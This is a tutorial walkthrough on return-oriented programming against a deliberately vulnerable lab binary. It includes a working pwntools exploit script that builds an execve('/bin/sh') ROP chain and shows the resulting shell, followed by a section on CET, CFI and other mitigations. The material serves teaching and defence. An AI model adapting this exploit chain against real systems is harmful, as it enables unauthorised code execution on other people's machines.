Building a ROP Chain Step by Step
With NX on, injected shellcode is dead — so we reuse the program's own code. A full lab walkthrough: find gadgets, hand-build an execve syscall chain with pwntools, then watch CET and CFI break it.
This is the second walkthrough in the Exploitation Techniques area. The previous guide hijacked a saved return address and jumped to a convenient win() function, with NX left irrelevant because we jumped to existing code. Here there is no win(), and we cannot inject our own code because NX is on. The answer is return-oriented programming: stitch together fragments of the code already in the binary to do what we want.
As before, we build the target ourselves and run it in a disposable lab. Re-read the lab rules if you skipped them.
Why NX forces code reuse
NX / DEP marks writable memory — the stack, the heap — as non-executable. Overwriting the return address with a pointer into your input now fails instantly: the page holding your bytes has no execute permission, so the CPU faults on the first instruction.
ROP never executes attacker bytes. Every value we put on the stack is either a pointer to executable code that already exists, or data those instructions consume. NX cannot help, because from the CPU's point of view we only ever run legitimately mapped, executable code.
What a gadget is
A gadget is a short instruction sequence ending in ret. ret pops the next 8 bytes off the stack into the instruction pointer and jumps there. So if we lay out a stack like this:
- ◀ rsp
pop rdi ; retret pops and jumps here first &"/bin/sh"popped into rdipop rsi ; retits ret jumps here next0popped into rsisyscallfires execve("/bin/sh", 0, 0)
each gadget's trailing ret launches the next one. Chained, they can load every argument register and fire a syscall. Our goal is the classic: execve("/bin/sh", NULL, NULL).
On x86-64 Linux the System V convention passes syscall arguments in rax (number), rdi, rsi, rdx. For execve that is:
| Register | Value | Meaning |
|---|---|---|
rax | 59 | syscall number for execve |
rdi | pointer to "/bin/sh" | pathname |
rsi | 0 | argv (NULL) |
rdx | 0 | envp (NULL) |
The target
/* vuln.c — deliberately vulnerable demo. Build static, NX on, canary off. */
#include <stdio.h>
#include <unistd.h>
void vuln(void) {
char buf[64];
read(0, buf, 512); /* the bug: 512 bytes into a 64-byte buffer */
}
int main(void) {
setvbuf(stdout, NULL, _IONBF, 0);
vuln();
return 0;
}
Build it statically so the binary contains a large, fixed set of gadgets and its own copy of the "/bin/sh" string — this keeps the walkthrough self-contained and every address stable:
gcc -static -fno-stack-protector -no-pie -O0 -g -o vuln vuln.c
checksec confirms NX is the defence in play:
$ checksec --file=./vuln
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled ← this is why we need ROP
PIE: No PIE (0x400000)
Step 1 — find the offset
Same cyclic-pattern method as the ret2win guide:
from pwn import *
context.binary = ELF("./vuln")
io = process("./vuln")
io.send(cyclic(200))
io.wait()
print("offset:", cyclic_find(io.corefile.read(io.corefile.rsp, 8)))
# offset: 72
72 bytes fill buf (64) plus saved rbp (8); byte 72 onward is the return address, i.e. the start of our chain.
Step 2 — hunt for gadgets
ROPgadget (or pwntools' ROP) lists the sequences the binary contains:
$ ROPgadget --binary vuln | grep -E ': pop rdi ; ret$'
0x0000000000401f6f : pop rdi ; ret
$ ROPgadget --binary vuln | grep -E ': pop rsi ; ret$'
0x000000000040a44e : pop rsi ; ret
$ ROPgadget --binary vuln | grep -E ': pop rax ; ret$'
0x0000000000450507 : pop rax ; ret
$ ROPgadget --binary vuln | grep -E ': syscall ; ret$'
0x0000000000402424 : syscall ; ret
pop rdx alone is often missing; you usually find it paired, e.g. pop rdx ; pop rbx ; ret. That is fine — supply a throwaway value for rbx. And the "/bin/sh" string lives inside static glibc:
$ ROPgadget --binary vuln --string '/bin/sh'
0x00000000004a5a2f : /bin/sh
If your build lacks the string, write it yourself: find a
mov qword ptr [rXX], rYY ; retgadget, point one register at a writable.bssaddress, load"/bin/sh\0"into another, and store it — then use that.bssaddress asrdi. pwntools automates this too (below).
Step 3 — assemble the chain by hand
Now we lay the gadgets and their operands on the stack in order:
# rop_manual.py
from pwn import *
context.binary = elf = ELF("./vuln")
pop_rdi = 0x401f6f
pop_rsi = 0x40a44e
pop_rdx_rbx = 0x4XXXXX # from: ROPgadget | grep 'pop rdx ; pop rbx ; ret'
pop_rax = 0x450507
syscall = 0x402424
binsh = next(elf.search(b"/bin/sh\x00")) # pwntools finds the string
chain = b""
chain += p64(pop_rdi) + p64(binsh) # rdi = "/bin/sh"
chain += p64(pop_rsi) + p64(0) # rsi = 0
chain += p64(pop_rdx_rbx) + p64(0) + p64(0) # rdx = 0 (rbx = 0 throwaway)
chain += p64(pop_rax) + p64(59) # rax = 59 (execve)
chain += p64(syscall) # execve("/bin/sh", 0, 0)
payload = b"A" * 72 + chain
io = process("./vuln")
io.send(payload)
io.interactive()
$ python3 rop_manual.py
[*] Switching to interactive mode
$ id
uid=1000(lab) gid=1000(lab) groups=1000(lab)
The ret at the end of vuln jumped to pop rdi ; ret; its ret jumped to pop rsi ; ret; and so on down the chain until syscall executed execve. Not one byte of our input was executed as code — only consumed as addresses and data.
Stack alignment, again
If syscall (or a libc function you call) faults, it is the same 16-byte alignment issue from the ret2win guide. Insert a bare ret gadget at the front of the chain to shift the stack by 8.
Step 4 — let pwntools build it
Hand-assembly teaches the mechanism; in practice pwntools' ROP object finds gadgets and lays out the chain (including writing "/bin/sh" to .bss when needed):
from pwn import *
context.binary = elf = ELF("./vuln")
rop = ROP(elf)
rop.execve(next(elf.search(b"/bin/sh\x00")), 0, 0)
log.info(rop.dump()) # prints the resolved chain
payload = flat({72: rop.chain()})
io = process("./vuln"); io.send(payload); io.interactive()
Understanding the manual version is what lets you debug it when the automated one cannot find a gadget it needs.
Step 5 — turn on the mitigations that stop ROP
This is the defensive half. NX did its job — it stopped code injection — but not code reuse. The mitigations aimed at ROP attack the returns themselves.
Shadow stack / Intel CET
gcc -static -fno-stack-protector -no-pie -fcf-protection=full -O0 -o vuln_cet vuln.c
On CET-capable hardware and kernels, a shadow stack keeps a protected second copy of each return address. At every ret, the CPU compares the normal stack against the shadow stack; our chain overwrote the normal one, so the first ret into a gadget mismatches and the process is killed. CET's indirect-branch tracking additionally demands that valid call/jump targets start with an endbr64 instruction — gadgets in the middle of functions do not, so they become invalid indirect targets.
Control-flow integrity
clang -fsanitize=cfi -flto -fvisibility=hidden -static -o vuln_cfi vuln.c
Control-flow integrity constrains indirect branches to a compiler-computed set of legitimate targets. Forward-edge CFI does not stop return-address overwrites by itself, which is why it is paired with a shadow stack for the backward edge — together they close both directions ROP relies on.
And the ones that just raise the cost
| Mitigation | Effect on this ROP chain |
|---|---|
| Stack canary | Detects the linear overwrite before the first ret — chain never starts |
| PIE + ASLR | Gadget addresses randomize per run; the chain needs a leak first |
| Full RELRO | Closes the GOT-overwrite path (the next guide) |
| Shadow stack / CET | Backward-edge: mismatched return address aborts the process |
| CFI | Forward-edge: indirect branches restricted to valid targets |
What this teaches a defender
- NX is necessary but not sufficient. It ended shellcode injection, and attackers answered with ROP. Reading a
checksecline as "NX: enabled, therefore safe" is the mistake this walkthrough exists to correct. - The defences that actually target ROP are backward-edge protections — shadow stacks / CET, and PAC-signed returns on ARM. If you ship native code, enabling
-fcf-protection(and building for shadow-stack-capable targets) is the single most direct answer to this technique. - Gadgets are a property of your whole binary, including static libraries. Smaller, less statically-linked binaries expose fewer of them. This is a real, if secondary, reason to prefer lean builds.
- None of this fixes the
read(0, buf, 512)bug. It only decides whether the bug ends in a crash or a shell. The fix — bounding the read — lives in stack buffer overflows.
Key takeaways
- ROP defeats NX by executing only code that is already mapped executable, driven by return addresses placed on the stack.
- A gadget is a short instruction sequence ending in
ret; chained gadgets can load argument registers and fire a syscall. - The classic goal is
execve("/bin/sh", 0, 0): setrax=59,rdi=&"/bin/sh",rsi=rdx=0, thensyscall. - Shadow stacks / CET and CFI are the mitigations built specifically to break ROP; canary, PIE and RELRO raise its cost at other steps.
Next in this series: reusing libc directly with ret2libc, and turning a format-string bug into an arbitrary read and write.